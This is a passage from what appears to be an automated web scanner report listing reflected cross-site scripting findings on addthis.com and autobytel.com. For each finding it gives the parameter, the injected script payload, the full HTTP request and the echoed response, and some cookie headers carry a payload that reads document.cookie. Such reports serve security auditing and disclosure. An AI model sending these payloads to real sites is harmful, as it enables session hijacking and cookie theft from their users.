The value of the pub request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 31b76"%20style%3dx%3aexpression(alert(1))%209db792d721a was submitted in the pub parameter. This input was echoed as 31b76\" style=x:expression(alert(1)) 9db792d721a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /bookmark.php?wt=nw&pub=sistergoldenhair31b76"%20style%3dx%3aexpression(alert(1))%209db792d721a&url= HTTP/1.1
Host: www.addthis.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 14:04:00 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Set-Cookie: Coyote-2-a0f0083=a0f021f:0; path=/
Content-Length: 92650

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>AddThis Social Bookm
...[SNIP]...
<input type="hidden" id="pub" name="pub" value="sistergoldenhair31b76\" style=x:expression(alert(1)) 9db792d721a" />
...[SNIP]...

4.469. http://www.addthis.com/bookmark.php [url parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.addthis.com
Path:	/bookmark.php

Issue detail

The value of the url request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c73a7"style%3d"x%3aexpression(alert(1))"ad069683679 was submitted in the url parameter. This input was echoed as c73a7"style="x:expression(alert(1))"ad069683679 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /bookmark.php?wt=nw&pub=sistergoldenhair&url=c73a7"style%3d"x%3aexpression(alert(1))"ad069683679 HTTP/1.1
Host: www.addthis.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 14:04:11 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Set-Cookie: Coyote-2-a0f0083=a0f021f:0; path=/
Content-Length: 92574

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>AddThis Social Bookm
...[SNIP]...
<input type="hidden" id="url" name="url" value="c73a7"style="x:expression(alert(1))"ad069683679" />
...[SNIP]...

4.470. http://www.addthis.com/feed.php [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.addthis.com
Path:	/feed.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload d6e65<script>alert(1)</script>e68058a383 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /feed.phpd6e65<script>alert(1)</script>e68058a383 HTTP/1.1
Host: www.addthis.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 404 Not Found
Date: Mon, 24 Jan 2011 16:03:23 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
Set-Cookie: PHPSESSID=4hrqgaprgqm9fn84gll6icugn6; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 1463
Connection: close
Content-Type: text/html; charset=UTF-8
Set-Cookie: Coyote-2-a0f0083=a0f022f:0; path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Not found</title>
<l
...[SNIP]...
<strong>feed.phpd6e65<script>alert(1)</script>e68058a383</strong>
...[SNIP]...

4.471. http://www.addthis.com/feed.php [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.addthis.com
Path:	/feed.php

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9b84e"-alert(1)-"516cc2a215 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /feed.php9b84e"-alert(1)-"516cc2a215 HTTP/1.1
Host: www.addthis.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 404 Not Found
Date: Mon, 24 Jan 2011 16:03:22 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
Set-Cookie: PHPSESSID=r92fn8cu7bp5hbkbkasehn8an1; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 1437
Connection: close
Content-Type: text/html; charset=UTF-8
Set-Cookie: Coyote-2-a0f0083=a0f022f:0; path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Not found</title>
<l
...[SNIP]...
<script type="text/javascript">
var u = "/404/feed.php9b84e"-alert(1)-"516cc2a215";
if (typeof utmx != "undefined" && utmx('combination') != undefined) {
u += (u.indexOf("?") == -1 ? '?' : '&') + 'com=' + utmx('combination');
}
if (window._gat) {
var gaPageTracker = _gat._get
...[SNIP]...

4.472. http://www.addthis.com/feed.php [h1 parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.addthis.com
Path:	/feed.php

Issue detail

The value of the h1 request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d7187"style%3d"x%3aexpression(alert(1))"6a86d525460 was submitted in the h1 parameter. This input was echoed as d7187"style="x:expression(alert(1))"6a86d525460 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /feed.php?pub=kicko&h1=http%3A%2F%2Fwww.x64bitdownload.com%2Frss%2Fdownloads.xmld7187"style%3d"x%3aexpression(alert(1))"6a86d525460&t1= HTTP/1.1
Host: www.addthis.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 16:03:43 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
Set-Cookie: pub=kicko; expires=Sat, 23-Jul-2011 16:03:43 GMT; path=/
Vary: Accept-Encoding
Content-Length: 7939
Connection: close
Content-Type: text/html; charset=UTF-8
Set-Cookie: Coyote-2-a0f0083=a0f022f:0; path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Cont
...[SNIP]...
<input name="h1" type="hidden" value="http://www.x64bitdownload.com/rss/downloads.xmld7187"style="x:expression(alert(1))"6a86d525460" checked="checked" />
...[SNIP]...

4.473. http://www.addthis.com/feed.php [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.addthis.com
Path:	/feed.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a1604"style%3d"x%3aexpression(alert(1))"64e1f3b8e2b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as a1604"style="x:expression(alert(1))"64e1f3b8e2b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /feed.php?pub=kicko&h1=http%3A%2F%2Fwww.x64bitdownload.com%2Frss%2Fdownloads.xml/a1604"style%3d"x%3aexpression(alert(1))"64e1f3b8e2b&t1= HTTP/1.1
Host: www.addthis.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 16:03:53 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
Set-Cookie: pub=kicko; expires=Sat, 23-Jul-2011 16:03:53 GMT; path=/
Vary: Accept-Encoding
Content-Length: 7942
Connection: close
Content-Type: text/html; charset=UTF-8
Set-Cookie: Coyote-2-a0f0083=a0f021f:0; path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Cont
...[SNIP]...
<input name="h1" type="hidden" value="http://www.x64bitdownload.com/rss/downloads.xml/a1604"style="x:expression(alert(1))"64e1f3b8e2b" checked="checked" />
...[SNIP]...

4.474. http://www.addthis.com/feed.php [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.addthis.com
Path:	/feed.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 99026"-alert(1)-"b65f93cd92c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /feed.php/99026"-alert(1)-"b65f93cd92c HTTP/1.1
Host: www.addthis.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 16:03:20 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
Set-Cookie: pub=deleted; expires=Sun, 24-Jan-2010 16:03:19 GMT; path=/
Vary: Accept-Encoding
Content-Length: 7617
Connection: close
Content-Type: text/html; charset=UTF-8
Set-Cookie: Coyote-2-a0f0083=a0f022f:0; path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Cont
...[SNIP]...
<script type="text/javascript">
var u = "/feed.php/99026"-alert(1)-"b65f93cd92c";
if (typeof utmx != "undefined" && utmx('combination') != undefined) {
u += (u.indexOf("?") == -1 ? '?' : '&') + 'com=' + utmx('combination');
}
if (window._gat) {
var gaPageTracker = _gat._get
...[SNIP]...

4.475. http://www.addthis.com/feed.php [pub parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.addthis.com
Path:	/feed.php

Issue detail

The value of the pub request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e60a1"style%3d"x%3aexpression(alert(1))"e5131ef9ed7 was submitted in the pub parameter. This input was echoed as e60a1"style="x:expression(alert(1))"e5131ef9ed7 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /feed.php?pub=kickoe60a1"style%3d"x%3aexpression(alert(1))"e5131ef9ed7&h1=http%3A%2F%2Fwww.x64bitdownload.com%2Frss%2Fdownloads.xml&t1= HTTP/1.1
Host: www.addthis.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 16:03:32 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
Set-Cookie: pub=kickoe60a1%22style%3D%22x%3Aexpression%28alert%281%29%29%22e5131ef9ed7; expires=Sat, 23-Jul-2011 16:03:32 GMT; path=/
Vary: Accept-Encoding
Content-Length: 7976
Connection: close
Content-Type: text/html; charset=UTF-8
Set-Cookie: Coyote-2-a0f0083=a0f022f:0; path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Cont
...[SNIP]...
<input type="hidden" id="pub" name="pub" value="kickoe60a1"style="x:expression(alert(1))"e5131ef9ed7" />
...[SNIP]...

4.476. http://www.autobytel.com/a.cfml [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.autobytel.com
Path:	/a.cfml

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 849d4"><script>alert(1)</script>b7a2f5f5095 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /a.cfml?849d4"><script>alert(1)</script>b7a2f5f5095=1 HTTP/1.1
Host: www.autobytel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TIME=%7Bts%20%272011%2D01%2D24%2017%3A06%3A34%27%7D; BDATALIST=Google%20Search%7Ef34b4%2D%2D%3E%3Cimg%20src%3Da%20onerror%3Dalert%28document%2Ecookie%29%3Ef067754e5c4; __utmz=47232823.1295903274.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/31; USER_UUID_VCH=427D3445%2DBFE0%2DBF1D%2D884FC154EC603416; Axxd=1; s_sq=%5B%5BB%5D%5D; PV_CT=2; cweb=JONQJVS10.4.128.176CKMMM; HOMEVERSION=2; AxData=; s_cc=true; COUNT=1; ID=13148%3BABTL; ENTERED_POSTAL_CODE_VCH=; s_vi=[CS]v1|269EF4F28501182F-60000108600B027D[CE]; __utma=47232823.1972730476.1295903274.1295903274.1295903274.1; __utmc=47232823; __utmb=47232823.1.10.1295903274;

Response

HTTP/1.1 404 Not Found
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/7.0
Content-Length: 23472
Vary: Accept-Encoding
Expires: Mon, 24 Jan 2011 23:46:09 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 24 Jan 2011 23:46:09 GMT
Connection: close
Set-Cookie: ENTERED_POSTAL_CODE_VCH=;expires=Wed, 16-Jan-2041 23:46:09 GMT;path=/
Set-Cookie: HOMEVERSION=2;path=/
Set-Cookie: ENTERED_POSTAL_CODE_VCH=;expires=Wed, 16-Jan-2041 23:46:09 GMT;path=/
Set-Cookie: HOMEVERSION=2;path=/
Set-Cookie: PV_CT=3;path=/




  <!--
This file creates a boxerjam cookie that expires
...[SNIP]...
<link rel="canonical" href="http://www.autobytel.com/a.cfml?849d4"><script>alert(1)</script>b7a2f5f5095=1">
...[SNIP]...

4.477. http://www.autobytel.com/ask-our-mechanics/my-garage.htm [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.autobytel.com
Path:	/ask-our-mechanics/my-garage.htm

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 558ec"><script>alert(1)</script>629e085a616 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /ask-our-mechanics/my-garage.htm?558ec"><script>alert(1)</script>629e085a616=1 HTTP/1.1
Host: www.autobytel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TIME=%7Bts%20%272011%2D01%2D24%2017%3A06%3A34%27%7D; BDATALIST=Google%20Search%7Ef34b4%2D%2D%3E%3Cimg%20src%3Da%20onerror%3Dalert%28document%2Ecookie%29%3Ef067754e5c4; __utmz=47232823.1295903274.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/31; USER_UUID_VCH=427D3445%2DBFE0%2DBF1D%2D884FC154EC603416; Axxd=1; s_sq=%5B%5BB%5D%5D; PV_CT=2; cweb=JONQJVS10.4.128.176CKMMM; HOMEVERSION=2; AxData=; s_cc=true; COUNT=1; ID=13148%3BABTL; ENTERED_POSTAL_CODE_VCH=; s_vi=[CS]v1|269EF4F28501182F-60000108600B027D[CE]; __utma=47232823.1972730476.1295903274.1295903274.1295903274.1; __utmc=47232823; __utmb=47232823.1.10.1295903274;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/7.0
Expires: Mon, 24 Jan 2011 23:52:35 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 24 Jan 2011 23:52:35 GMT
Content-Length: 22206
Connection: close
Set-Cookie: ENTERED_POSTAL_CODE_VCH=;expires=Wed, 16-Jan-2041 23:52:34 GMT;path=/
Set-Cookie: HOMEVERSION=2;path=/
Set-Cookie: PV_CT=3;path=/

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb
...[SNIP]...
<link rel="canonical" href="http://www.autobytel.com/ask-our-mechanics/my-garage.htm?558ec"><script>alert(1)</script>629e085a616=1">
...[SNIP]...

4.478. http://www.autobytel.com/auto-insurance-quotes.htm [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.autobytel.com
Path:	/auto-insurance-quotes.htm

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b355e"><script>alert(1)</script>20cc0a1c0fe was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /auto-insurance-quotes.htm?b355e"><script>alert(1)</script>20cc0a1c0fe=1 HTTP/1.1
Host: www.autobytel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TIME=%7Bts%20%272011%2D01%2D24%2017%3A06%3A34%27%7D; BDATALIST=Google%20Search%7Ef34b4%2D%2D%3E%3Cimg%20src%3Da%20onerror%3Dalert%28document%2Ecookie%29%3Ef067754e5c4; __utmz=47232823.1295903274.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/31; USER_UUID_VCH=427D3445%2DBFE0%2DBF1D%2D884FC154EC603416; Axxd=1; s_sq=%5B%5BB%5D%5D; PV_CT=2; cweb=JONQJVS10.4.128.176CKMMM; HOMEVERSION=2; AxData=; s_cc=true; COUNT=1; ID=13148%3BABTL; ENTERED_POSTAL_CODE_VCH=; s_vi=[CS]v1|269EF4F28501182F-60000108600B027D[CE]; __utma=47232823.1972730476.1295903274.1295903274.1295903274.1; __utmc=47232823; __utmb=47232823.1.10.1295903274;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/7.0
Expires: Mon, 24 Jan 2011 23:55:01 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 24 Jan 2011 23:55:01 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: ENTERED_POSTAL_CODE_VCH=;expires=Wed, 16-Jan-2041 23:55:01 GMT;path=/
Set-Cookie: HOMEVERSION=2;path=/
Set-Cookie: QUICKPOLL=0%2C0%3B;expires=Wed, 16-Jan-2041 23:55:01 GMT;path=/
Set-Cookie: PV_CT=3;path=/
Content-Length: 33688

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb
...[SNIP]...
<link rel="canonical" href="http://www.autobytel.com/auto-insurance-quotes.htm?b355e"><script>alert(1)</script>20cc0a1c0fe=1">
...[SNIP]...

4.479. http://www.autobytel.com/car-advice.htm [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.autobytel.com
Path:	/car-advice.htm

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3e5d6"><script>alert(1)</script>5ac1d95ea8c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /car-advice.htm?3e5d6"><script>alert(1)</script>5ac1d95ea8c=1 HTTP/1.1
Host: www.autobytel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TIME=%7Bts%20%272011%2D01%2D24%2017%3A06%3A34%27%7D; BDATALIST=Google%20Search%7Ef34b4%2D%2D%3E%3Cimg%20src%3Da%20onerror%3Dalert%28document%2Ecookie%29%3Ef067754e5c4; __utmz=47232823.1295903274.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/31; USER_UUID_VCH=427D3445%2DBFE0%2DBF1D%2D884FC154EC603416; Axxd=1; s_sq=%5B%5BB%5D%5D; PV_CT=2; cweb=JONQJVS10.4.128.176CKMMM; HOMEVERSION=2; AxData=; s_cc=true; COUNT=1; ID=13148%3BABTL; ENTERED_POSTAL_CODE_VCH=; s_vi=[CS]v1|269EF4F28501182F-60000108600B027D[CE]; __utma=47232823.1972730476.1295903274.1295903274.1295903274.1; __utmc=47232823; __utmb=47232823.1.10.1295903274;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/7.0
Expires: Mon, 24 Jan 2011 23:56:26 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 24 Jan 2011 23:56:26 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: ENTERED_POSTAL_CODE_VCH=;expires=Wed, 16-Jan-2041 23:56:26 GMT;path=/
Set-Cookie: HOMEVERSION=2;path=/
Set-Cookie: QUICKPOLL=0%2C0%3B;expires=Wed, 16-Jan-2041 23:56:26 GMT;path=/
Set-Cookie: PV_CT=3;path=/
Content-Length: 43802

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb
...[SNIP]...
<link rel="canonical" href="http://www.autobytel.com/car-advice.htm?3e5d6"><script>alert(1)</script>5ac1d95ea8c=1">
...[SNIP]...

4.480. http://www.autobytel.com/car-dealers.htm [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.autobytel.com
Path:	/car-dealers.htm

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 59628"><script>alert(1)</script>c17b73d46b0 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /car-dealers.htm?59628"><script>alert(1)</script>c17b73d46b0=1 HTTP/1.1
Host: www.autobytel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TIME=%7Bts%20%272011%2D01%2D24%2017%3A06%3A34%27%7D; BDATALIST=Google%20Search%7Ef34b4%2D%2D%3E%3Cimg%20src%3Da%20onerror%3Dalert%28document%2Ecookie%29%3Ef067754e5c4; __utmz=47232823.1295903274.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/31; USER_UUID_VCH=427D3445%2DBFE0%2DBF1D%2D884FC154EC603416; Axxd=1; s_sq=%5B%5BB%5D%5D; PV_CT=2; cweb=JONQJVS10.4.128.176CKMMM; HOMEVERSION=2; AxData=; s_cc=true; COUNT=1; ID=13148%3BABTL; ENTERED_POSTAL_CODE_VCH=; s_vi=[CS]v1|269EF4F28501182F-60000108600B027D[CE]; __utma=47232823.1972730476.1295903274.1295903274.1295903274.1; __utmc=47232823; __utmb=47232823.1.10.1295903274;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/7.0
Expires: Tue, 25 Jan 2011 00:04:27 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Tue, 25 Jan 2011 00:04:27 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: ENTERED_POSTAL_CODE_VCH=;expires=Thu, 17-Jan-2041 00:04:26 GMT;path=/
Set-Cookie: HOMEVERSION=2;path=/
Set-Cookie: QUICKPOLL=0%2C0%3B;expires=Thu, 17-Jan-2041 00:04:26 GMT;path=/
Set-Cookie: PV_CT=3;path=/
Content-Length: 38874

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb
...[SNIP]...
<link rel="canonical" href="http://www.autobytel.com/car-dealers.htm?59628"><script>alert(1)</script>c17b73d46b0=1">
...[SNIP]...

4.481. http://www.autobytel.com/car-financing.htm [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.autobytel.com
Path:	/car-financing.htm

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9a1ba"><script>alert(1)</script>72bb89c822 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /car-financing.htm?9a1ba"><script>alert(1)</script>72bb89c822=1 HTTP/1.1
Host: www.autobytel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TIME=%7Bts%20%272011%2D01%2D24%2017%3A06%3A34%27%7D; BDATALIST=Google%20Search%7Ef34b4%2D%2D%3E%3Cimg%20src%3Da%20onerror%3Dalert%28document%2Ecookie%29%3Ef067754e5c4; __utmz=47232823.1295903274.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/31; USER_UUID_VCH=427D3445%2DBFE0%2DBF1D%2D884FC154EC603416; Axxd=1; s_sq=%5B%5BB%5D%5D; PV_CT=2; cweb=JONQJVS10.4.128.176CKMMM; HOMEVERSION=2; AxData=; s_cc=true; COUNT=1; ID=13148%3BABTL; ENTERED_POSTAL_CODE_VCH=; s_vi=[CS]v1|269EF4F28501182F-60000108600B027D[CE]; __utma=47232823.1972730476.1295903274.1295903274.1295903274.1; __utmc=47232823; __utmb=47232823.1.10.1295903274;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/7.0
Expires: Mon, 24 Jan 2011 23:53:03 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 24 Jan 2011 23:53:03 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: ENTERED_POSTAL_CODE_VCH=;expires=Wed, 16-Jan-2041 23:53:02 GMT;path=/
Set-Cookie: HOMEVERSION=2;path=/
Set-Cookie: QUICKPOLL=0%2C0%3B;expires=Wed, 16-Jan-2041 23:53:02 GMT;path=/
Set-Cookie: PV_CT=3;path=/
Content-Length: 41471

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb
...[SNIP]...
<link rel="canonical" href="http://www.autobytel.com/car-financing.htm?9a1ba"><script>alert(1)</script>72bb89c822=1">
...[SNIP]...

4.482. http://www.autobytel.com/car-incentives.htm [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.autobytel.com
Path:	/car-incentives.htm

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 62a66"><script>alert(1)</script>d49e48ec7f0 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /car-incentives.htm?62a66"><script>alert(1)</script>d49e48ec7f0=1 HTTP/1.1
Host: www.autobytel.com
Accept: */*
Accept-Language: en
